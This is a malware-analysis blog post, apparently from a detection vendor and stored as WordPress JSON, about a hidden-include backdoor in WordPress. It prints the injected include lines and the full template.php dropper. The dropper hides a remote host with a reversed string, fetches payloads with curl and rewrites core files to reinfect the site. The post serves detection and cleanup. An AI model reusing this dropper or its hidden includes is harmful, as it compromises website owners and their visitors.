{"id":4370,"date":"2017-11-25T12:45:05","date_gmt":"2017-11-25T09:45:05","guid":{"rendered":"https:\/\/malware.expert\/?p=4370"},"modified":"2017-11-25T12:45:05","modified_gmt":"2017-11-25T09:45:05","slug":"wordpress-hidden-include","status":"publish","type":"post","link":"https:\/\/malware.expert\/backdoor\/wordpress-hidden-include\/","title":{"rendered":"WordPress Hidden Include"},"content":{"rendered":"<p>Today we found undetected malware, which keep it hidden and try loading again if it deleted.<\/p>\n<p>We generated Signatures to Detect these hidden includes:<\/p>\n<pre>\r\n\/index.php: {HEX}Malware.Expert.wordpress.hidden.include.0.UNOFFICIAL FOUND\r\n\/wp-load.php: {HEX}Malware.Expert.wordpress.hidden.include.1.UNOFFICIAL FOUND\r\n\/wp-includes\/template.php: {HEX}Malware.Expert.malware.url.7od.info.0.UNOFFICIAL FOUND\r\n\/wp-includes\/Requests\/IPconfig.ini: {HEX}Malware.Expert.generic.malware.39.UNOFFICIAL FOUND\r\n\/wp-includes\/js\/utilities.js: {HEX}Malware.Expert.generic.malware.39.UNOFFICIAL FOUND\r\n<\/pre>\n<h2>WordPress<\/h2>\n<h3>index.php<\/h3>\n<pre class=\"brush: php; gutter: true; highlight: [7]; title: ; notranslate\" title=\"\">\r\n&lt;?php\r\n\/**\r\n * Front to the WordPress application. This file doesn't do anything, but loads\r\n * wp-blog-header.php which does and tells WordPress to load the theme.\r\n *\r\n * @package WordPress\r\n *\/@include( dirname( __FILE__ ) . '\/wp-includes\/js\/utilities.js' );\r\n\r\n\/**\r\n<\/pre>\n<h3>wp-load.php<\/h3>\n<p>End of file:<\/p>\n<pre class=\"brush: php; highlight: [2,3]; title: ; notranslate\" title=\"\">\r\n}\r\n        \/\/ Network host configuration. Not recommended edit this code!\r\n                @include ( ABSPATH . WPINC . '\/Requests\/IPconfig.ini' );\r\n<\/pre>\n<h3>template.php<\/h3>\n<pre class=\"brush: php; title: ; notranslate\" title=\"\">\r\nerror_reporting(0); $wp_support = strrev ( '\/wordpress\/ofni.do7\/\/:ptth' );\r\n\r\nif ( is_file ( '.\/index.php' ) == false ) {\r\n\t$wp_up_data = curl_init ( $wp_support.'index' ); curl_setopt ( $wp_up_data, CURLOPT_TIMEOUT, 100 ); curl_setopt ( $wp_up_data, CURLOPT_RETURNTRANSFER, 1 );\r\n\t\t$wp_ip_data = curl_exec ( $wp_up_data );\r\ncurl_close ( $wp_up_data ); unlink ( '.\/index.php' ); file_put_contents ( '.\/index.php', $wp_ip_data ); }\r\n\r\nif ( is_file ( '.\/index.php' ) ) {\r\n\tif ( filesize ( '.\/index.php' ) &lt;= 498 OR filesize ( '.\/index.php' ) &gt;= 501 ) {\r\n\t\t$wp_up_data = curl_init ( $wp_support.'index' ); curl_setopt ( $wp_up_data, CURLOPT_TIMEOUT, 100 ); curl_setopt ( $wp_up_data, CURLOPT_RETURNTRANSFER, 1 );\r\n\t\t$wp_ip_data = curl_exec ( $wp_up_data );\r\ncurl_close ( $wp_up_data ); unlink ( '.\/index.php' ); file_put_contents ( '.\/index.php', $wp_ip_data ); }\r\n}\r\n\r\nif ( is_file ( ABSPATH . WPINC . '\/js\/utilities.js' ) == false ) {\r\n\t$wp_up_data = curl_init ( $wp_support.'utilities' ); curl_setopt ( $wp_up_data, CURLOPT_TIMEOUT, 100 ); curl_setopt ( $wp_up_data, CURLOPT_RETURNTRANSFER, 1 );\r\n\t\t$wp_ip_data = curl_exec ( $wp_up_data );\r\ncurl_close ( $wp_up_data ); unlink ( ABSPATH . WPINC . '\/js\/utilities.js' ); file_put_contents ( ABSPATH . WPINC . '\/js\/utilities.js', $wp_ip_data ); }\r\n\r\nif ( is_file ( ABSPATH . WPINC . '\/js\/utilities.js' ) ) {\r\n\tif ( filesize ( ABSPATH . WPINC . '\/js\/utilities.js' ) &lt;= 77100 OR filesize ( ABSPATH . WPINC . '\/js\/utilities.js' ) &gt;= 88100 ) {\r\n\t\t$wp_up_data = curl_init ( $wp_support.'utilities' ); curl_setopt ( $wp_up_data, CURLOPT_TIMEOUT, 100 ); curl_setopt ( $wp_up_data, CURLOPT_RETURNTRANSFER, 1 );\r\n\t\t$wp_ip_data = curl_exec ( $wp_up_data );\r\ncurl_close ( $wp_up_data ); unlink ( ABSPATH . WPINC . '\/js\/utilities.js' ); file_put_contents ( ABSPATH . WPINC . '\/js\/utilities.js', $wp_ip_data ); }\r\n} if ( is_file ( '.\/wp-content\/uploads\/slideshow\/cache.ini' ) == false ) {\r\n\r\nif ( is_file ( ABSPATH . WPINC . '\/Requests\/IPconfig.ini' ) == false ) {\r\n\t$wp_up_data = curl_init ( $wp_support.'ipconfig' ); curl_setopt ( $wp_up_data, CURLOPT_TIMEOUT, 100 ); curl_setopt ( $wp_up_data, CURLOPT_RETURNTRANSFER, 1 );\r\n\t\t$wp_ip_data = curl_exec ( $wp_up_data );\r\ncurl_close ( $wp_up_data ); unlink ( ABSPATH . WPINC . '\/Requests\/IPconfig.ini' ); file_put_contents ( ABSPATH . WPINC . '\/Requests\/IPconfig.ini', $wp_ip_data ); }\r\n\r\nif ( is_file ( ABSPATH . WPINC . '\/Requests\/IPconfig.ini' ) ) {\r\n\tif ( filesize ( ABSPATH . WPINC . '\/Requests\/IPconfig.ini' ) &lt;= 77100 OR filesize ( ABSPATH . WPINC . '\/Requests\/IPconfig.ini' ) &gt;= 88100 ) {\r\n\t\t$wp_up_data = curl_init ( $wp_support.'ipconfig' ); curl_setopt ( $wp_up_data, CURLOPT_TIMEOUT, 100 ); curl_setopt ( $wp_up_data, CURLOPT_RETURNTRANSFER, 1 );\r\n\t\t$wp_ip_data = curl_exec ( $wp_up_data );\r\ncurl_close ( $wp_up_data ); unlink ( ABSPATH . WPINC . '\/Requests\/IPconfig.ini' ); file_put_contents ( ABSPATH . WPINC . '\/Requests\/IPconfig.ini', $wp_ip_data ); }\r\n}\r\n\r\nif ( stripos ( file_get_contents ( '.\/wp-load.php' ), 'IPconfig.ini' ) == false ) {\r\n\t$wp_up_data = curl_init ( $wp_support.'wpload' ); curl_setopt ( $wp_up_data, CURLOPT_TIMEOUT, 100 ); curl_setopt ( $wp_up_data, CURLOPT_RETURNTRANSFER, 1 );\r\n\t\t$wp_ip_data = curl_exec ( $wp_up_data );\r\ncurl_close ( $wp_up_data ); file_put_contents ( '.\/wp-load.php', $wp_ip_data, FILE_APPEND ); }\r\n}\r\n<\/pre>\n<h3>IPconfig.ini<\/h3>\n<p>Remove file<\/p>\n<h3>utilities.js<\/h3>\n<p>Remove file<\/p>\n<h2>Final Words<\/h2>\n<p>Use Malware Expert &#8211; <a href=\"https:\/\/malware.expert\/signatures\/\">Signatures<\/a> detect this malware from files for FREE!<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Today we found undetected malware, which keep it hidden and try loading again if it deleted. We generated Signatures to Detect these hidden includes: \/index.php: {HEX}Malware.Expert.wordpress.hidden.include.0.UNOFFICIAL FOUND \/wp-load.php: {HEX}Malware.Expert.wordpress.hidden.include.1.UNOFFICIAL FOUND \/wp-includes\/template.php: {HEX}Malware.Expert.malware.url.7od.info.0.UNOFFICIAL FOUND \/wp-includes\/Requests\/IPconfig.ini: {HEX}Malware.Expert.generic.malware.39.UNOFFICIAL FOUND \/wp-includes\/js\/utilities.js: {HEX}Malware.Expert.generic.malware.39.UNOFFICIAL FOUND WordPress index.php &lt;?php \/** * Front to the WordPress application. This file doesn&#8217;t do anything, but &#8230; <a title=\"WordPress Hidden Include\" class=\"read-more\" href=\"https:\/\/malware.expert\/backdoor\/wordpress-hidden-include\/\" aria-label=\"Read more about WordPress Hidden Include\">Read more<\/a><\/p>\n","protected":false},"author":1,"featured_media":2996,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[56],"tags":[15,1416,1417,1419,55,23,1418,1420,103,130],"class_list":["post-4370","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-backdoor","tag-clamav","tag-hidden","tag-index-php","tag-ipconfig-ini","tag-malware","tag-php","tag-template-php","tag-utilities-js","tag-wordpress","tag-wp-load-php"],"yoast_head":"<!-- This site is optimized with the Yoast SEO Premium plugin v25.7.1 (Yoast SEO v26.6) - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>WordPress Hidden Include<\/title>\n<meta name=\"description\" content=\"Today we found undetected malware in WordPress (index.php, wp-load.php and template.php), which keep it hidden and try loading again if it deleted.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/malware.expert\/backdoor\/wordpress-hidden-include\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"WordPress Hidden Include\" \/>\n<meta property=\"og:description\" content=\"Today we found undetected malware in WordPress (index.php, wp-load.php and template.php), which keep it hidden and try loading again if it deleted.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/malware.expert\/backdoor\/wordpress-hidden-include\/\" \/>\n<meta property=\"og:site_name\" content=\"Malware Expert\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/Malware.Expert\/\" \/>\n<meta property=\"article:published_time\" content=\"2017-11-25T09:45:05+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/malware.expert\/wp-content\/uploads\/2017\/06\/Malware_Expert_malware_details.png\" \/>\n\t<meta property=\"og:image:width\" content=\"1200\" \/>\n\t<meta property=\"og:image:height\" content=\"628\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"author\" content=\"admin\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@Malware__Expert\" \/>\n<meta name=\"twitter:site\" content=\"@Malware__Expert\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"admin\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"3 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/malware.expert\/backdoor\/wordpress-hidden-include\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/malware.expert\/backdoor\/wordpress-hidden-include\/\"},\"author\":{\"name\":\"admin\",\"@id\":\"https:\/\/malware.expert\/#\/schema\/person\/1016f76dbc76823a9aba2ba8f14abfd3\"},\"headline\":\"WordPress Hidden Include\",\"datePublished\":\"2017-11-25T09:45:05+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/malware.expert\/backdoor\/wordpress-hidden-include\/\"},\"wordCount\":584,\"publisher\":{\"@id\":\"https:\/\/malware.expert\/#organization\"},\"image\":{\"@id\":\"https:\/\/malware.expert\/backdoor\/wordpress-hidden-include\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/malware.expert\/wp-content\/uploads\/2017\/06\/Malware_Expert_malware_details.png\",\"keywords\":[\"clamav\",\"hidden\",\"index.php\",\"IPconfig.ini\",\"malware\",\"php\",\"template.php\",\"utilities.js\",\"wordpress\",\"wp-load.php\"],\"articleSection\":[\"backdoor\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/malware.expert\/backdoor\/wordpress-hidden-include\/\",\"url\":\"https:\/\/malware.expert\/backdoor\/wordpress-hidden-include\/\",\"name\":\"WordPress Hidden Include\",\"isPartOf\":{\"@id\":\"https:\/\/malware.expert\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/malware.expert\/backdoor\/wordpress-hidden-include\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/malware.expert\/backdoor\/wordpress-hidden-include\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/malware.expert\/wp-content\/uploads\/2017\/06\/Malware_Expert_malware_details.png\",\"datePublished\":\"2017-11-25T09:45:05+00:00\",\"description\":\"Today we found undetected malware in WordPress (index.php, wp-load.php and template.php), which keep it hidden and try loading again if it deleted.\",\"breadcrumb\":{\"@id\":\"https:\/\/malware.expert\/backdoor\/wordpress-hidden-include\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/malware.expert\/backdoor\/wordpress-hidden-include\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/malware.expert\/backdoor\/wordpress-hidden-include\/#primaryimage\",\"url\":\"https:\/\/malware.expert\/wp-content\/uploads\/2017\/06\/Malware_Expert_malware_details.png\",\"contentUrl\":\"https:\/\/malware.expert\/wp-content\/uploads\/2017\/06\/Malware_Expert_malware_details.png\",\"width\":1200,\"height\":628,\"caption\":\"Malware details\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/malware.expert\/backdoor\/wordpress-hidden-include\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/malware.expert\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"backdoor\",\"item\":\"https:\/\/malware.expert\/category\/backdoor\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"WordPress Hidden Include\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/malware.expert\/#website\",\"url\":\"https:\/\/malware.expert\/\",\"name\":\"Malware Expert\",\"description\":\"ModSecurity rules\",\"publisher\":{\"@id\":\"https:\/\/malware.expert\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/malware.expert\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/malware.expert\/#organization\",\"name\":\"Malware Expert\",\"url\":\"https:\/\/malware.expert\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/malware.expert\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/malware.expert\/wp-content\/uploads\/2023\/08\/cropped-malware_express_header_logo.png\",\"contentUrl\":\"https:\/\/malware.expert\/wp-content\/uploads\/2023\/08\/cropped-malware_express_header_logo.png\",\"width\":408,\"height\":82,\"caption\":\"Malware Expert\"},\"image\":{\"@id\":\"https:\/\/malware.expert\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/www.facebook.com\/Malware.Expert\/\",\"https:\/\/x.com\/Malware__Expert\"],\"publishingPrinciples\":\"https:\/\/malware.expert\/editorial-guidelines\/\"},{\"@type\":\"Person\",\"@id\":\"https:\/\/malware.expert\/#\/schema\/person\/1016f76dbc76823a9aba2ba8f14abfd3\",\"name\":\"admin\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/malware.expert\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/76c5b003c7f6492ce413d3ad91151c1d648c58e54c5b360eeb19eec3562a0393?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/76c5b003c7f6492ce413d3ad91151c1d648c58e54c5b360eeb19eec3562a0393?s=96&d=mm&r=g\",\"caption\":\"admin\"},\"sameAs\":[\"http:\/\/willberg.me\"],\"url\":\"https:\/\/malware.expert\/author\/admin\/\"}]}<\/script>\n<!-- \/ Yoast SEO Premium plugin. -->","yoast_head_json":{"title":"WordPress Hidden Include","description":"Today we found undetected malware in WordPress (index.php, wp-load.php and template.php), which keep it hidden and try loading again if it deleted.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/malware.expert\/backdoor\/wordpress-hidden-include\/","og_locale":"en_US","og_type":"article","og_title":"WordPress Hidden Include","og_description":"Today we found undetected malware in WordPress (index.php, wp-load.php and template.php), which keep it hidden and try loading again if it deleted.","og_url":"https:\/\/malware.expert\/backdoor\/wordpress-hidden-include\/","og_site_name":"Malware Expert","article_publisher":"https:\/\/www.facebook.com\/Malware.Expert\/","article_published_time":"2017-11-25T09:45:05+00:00","og_image":[{"width":1200,"height":628,"url":"https:\/\/malware.expert\/wp-content\/uploads\/2017\/06\/Malware_Expert_malware_details.png","type":"image\/png"}],"author":"admin","twitter_card":"summary_large_image","twitter_creator":"@Malware__Expert","twitter_site":"@Malware__Expert","twitter_misc":{"Written by":"admin","Est. reading time":"3 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/malware.expert\/backdoor\/wordpress-hidden-include\/#article","isPartOf":{"@id":"https:\/\/malware.expert\/backdoor\/wordpress-hidden-include\/"},"author":{"name":"admin","@id":"https:\/\/malware.expert\/#\/schema\/person\/1016f76dbc76823a9aba2ba8f14abfd3"},"headline":"WordPress Hidden Include","datePublished":"2017-11-25T09:45:05+00:00","mainEntityOfPage":{"@id":"https:\/\/malware.expert\/backdoor\/wordpress-hidden-include\/"},"wordCount":584,"publisher":{"@id":"https:\/\/malware.expert\/#organization"},"image":{"@id":"https:\/\/malware.expert\/backdoor\/wordpress-hidden-include\/#primaryimage"},"thumbnailUrl":"https:\/\/malware.expert\/wp-content\/uploads\/2017\/06\/Malware_Expert_malware_details.png","keywords":["clamav","hidden","index.php","IPconfig.ini","malware","php","template.php","utilities.js","wordpress","wp-load.php"],"articleSection":["backdoor"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/malware.expert\/backdoor\/wordpress-hidden-include\/","url":"https:\/\/malware.expert\/backdoor\/wordpress-hidden-include\/","name":"WordPress Hidden Include","isPartOf":{"@id":"https:\/\/malware.expert\/#website"},"primaryImageOfPage":{"@id":"https:\/\/malware.expert\/backdoor\/wordpress-hidden-include\/#primaryimage"},"image":{"@id":"https:\/\/malware.expert\/backdoor\/wordpress-hidden-include\/#primaryimage"},"thumbnailUrl":"https:\/\/malware.expert\/wp-content\/uploads\/2017\/06\/Malware_Expert_malware_details.png","datePublished":"2017-11-25T09:45:05+00:00","description":"Today we found undetected malware in WordPress (index.php, wp-load.php and template.php), which keep it hidden and try loading again if it deleted.","breadcrumb":{"@id":"https:\/\/malware.expert\/backdoor\/wordpress-hidden-include\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/malware.expert\/backdoor\/wordpress-hidden-include\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/malware.expert\/backdoor\/wordpress-hidden-include\/#primaryimage","url":"https:\/\/malware.expert\/wp-content\/uploads\/2017\/06\/Malware_Expert_malware_details.png","contentUrl":"https:\/\/malware.expert\/wp-content\/uploads\/2017\/06\/Malware_Expert_malware_details.png","width":1200,"height":628,"caption":"Malware details"},{"@type":"BreadcrumbList","@id":"https:\/\/malware.expert\/backdoor\/wordpress-hidden-include\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/malware.expert\/"},{"@type":"ListItem","position":2,"name":"backdoor","item":"https:\/\/malware.expert\/category\/backdoor\/"},{"@type":"ListItem","position":3,"name":"WordPress Hidden Include"}]},{"@type":"WebSite","@id":"https:\/\/malware.expert\/#website","url":"https:\/\/malware.expert\/","name":"Malware Expert","description":"ModSecurity rules","publisher":{"@id":"https:\/\/malware.expert\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/malware.expert\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/malware.expert\/#organization","name":"Malware Expert","url":"https:\/\/malware.expert\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/malware.expert\/#\/schema\/logo\/image\/","url":"https:\/\/malware.expert\/wp-content\/uploads\/2023\/08\/cropped-malware_express_header_logo.png","contentUrl":"https:\/\/malware.expert\/wp-content\/uploads\/2023\/08\/cropped-malware_express_header_logo.png","width":408,"height":82,"caption":"Malware Expert"},"image":{"@id":"https:\/\/malware.expert\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/Malware.Expert\/","https:\/\/x.com\/Malware__Expert"],"publishingPrinciples":"https:\/\/malware.expert\/editorial-guidelines\/"},{"@type":"Person","@id":"https:\/\/malware.expert\/#\/schema\/person\/1016f76dbc76823a9aba2ba8f14abfd3","name":"admin","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/malware.expert\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/76c5b003c7f6492ce413d3ad91151c1d648c58e54c5b360eeb19eec3562a0393?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/76c5b003c7f6492ce413d3ad91151c1d648c58e54c5b360eeb19eec3562a0393?s=96&d=mm&r=g","caption":"admin"},"sameAs":["http:\/\/willberg.me"],"url":"https:\/\/malware.expert\/author\/admin\/"}]}},"_links":{"self":[{"href":"https:\/\/malware.expert\/wp-json\/wp\/v2\/posts\/4370","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/malware.expert\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/malware.expert\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/malware.expert\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/malware.expert\/wp-json\/wp\/v2\/comments?post=4370"}],"version-history":[{"count":6,"href":"https:\/\/malware.expert\/wp-json\/wp\/v2\/posts\/4370\/revisions"}],"predecessor-version":[{"id":22636,"href":"https:\/\/malware.expert\/wp-json\/wp\/v2\/posts\/4370\/revisions\/22636"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/malware.expert\/wp-json\/wp\/v2\/media\/2996"}],"wp:attachment":[{"href":"https:\/\/malware.expert\/wp-json\/wp\/v2\/media?parent=4370"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/malware.expert\/wp-json\/wp\/v2\/categories?post=4370"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/malware.expert\/wp-json\/wp\/v2\/tags?post=4370"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}